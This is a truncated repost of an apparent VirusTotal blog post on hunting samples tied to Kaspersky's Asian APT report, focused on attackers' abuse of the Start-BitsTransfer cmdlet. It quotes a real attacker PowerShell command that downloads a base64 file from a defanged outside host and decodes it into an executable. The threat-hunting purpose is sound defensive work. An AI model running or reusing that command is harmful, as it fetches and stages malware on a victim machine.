Kaspersky’s CTI analysts recently released their Asian APT groups report, including details on behavior by different adversaries. Following our series on making third-party intelligence actionable using VirusTotal Intelligence, we have put on our threat hunter’s hat to find samples and monitor activity based on the report’s details.
Many of the behaviors shared by Kaspersky are based on the use of LOLBAS by attackers once the set foothold on the victim. This is an increasing trend by adversaries, which makes it critical for security analysts to understand these binaries’ capabilities.
Let’s start by analyzing the most interesting bits we found in the report.
Start-BitsTransfer
Start-BitsTransfer is a cmdlet that supports the download of multiple files, which seems to be an alternative for adversaries to the most commonly used bitsadmin.exe binary. The report describes its use in different cases, here we can find one example:
PowerShell “Start-BitsTransfer -Source hxxp://security.lomiasecure[.]net/crx/node.txt -Destination C:\\Users\\public\\node.txt -transfertype download” PowerShell if($InputString = Get-Content ‘C:\\users\\public\\node.txt’){ [System.IO.File]::WriteAllBytes(‘C:\\users\\public\\node.exe’, [System.Convert]::FromBase64String($InputString))}
The example uses FromBase64String and WriteAllBytes, so our query will look for either of them using an OR condition, as well as for the presence of the “Start-BitsTransfer” cmdlet in sandbox’s behavior. The following VT intelligence query obtains samples with similar (not identical) behaviors.
behavior_processes:”Start
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from VirusTotal Blog
Read the original article: